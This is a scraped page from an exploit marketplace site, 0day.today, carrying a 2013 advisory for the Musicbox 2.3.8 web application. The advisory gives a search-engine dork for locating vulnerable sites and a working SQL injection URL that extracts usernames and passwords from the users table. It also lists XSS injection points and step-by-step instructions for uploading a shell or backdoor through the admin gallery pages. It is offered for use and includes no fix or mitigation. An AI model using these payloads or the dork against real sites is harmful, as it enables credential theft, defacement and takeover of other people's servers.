0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Musicbox 2.3.8 - Multiple Vulnerabilities
[#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities #Author : DevilScreaM #Date : 25/08/2013 #Category : Web Applications #Vendor : http://www.musicboxv2.com/ #Version : 1.0 - 2.3.8 #Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008 inurl:genre_albums.php?id= #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability #Tested On : Windows 7 32 Bit (Mozila & Chrome) #Greetz : Newbie-Security.or.id SQL Injection Vulnerability http://site-target/genre_albums.php?id=[SQLI] Example http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- ========================================================================================== Cross site scripting / XSS Vulnerability *Search 1. Go To Fiture Search 2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search 3. See Result or See with URL http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0 Example http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0 ======================================================================================== *News Profile 1. Register To Website or go to link http://site-target/register.php 2. Login to Website 3. Go to Menu [ My News ] 4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1> And at Detials input your XSS or Text See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME] Example http://server/musicbox/member.php?uname=devilscream ========================================================================================== Shell Upload Vulnerability *Artist Galery 1. Go to Admin Page, And Login 2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php ============================================================================================ *Album Galery 1. Go to Admin Page, And Login 2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery 3. Select Option, Example Option "All Album", And Click Submit 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/album_gallery/Your_Backdoor.php ========================================================================================== # 0day.today [2024-11-15] #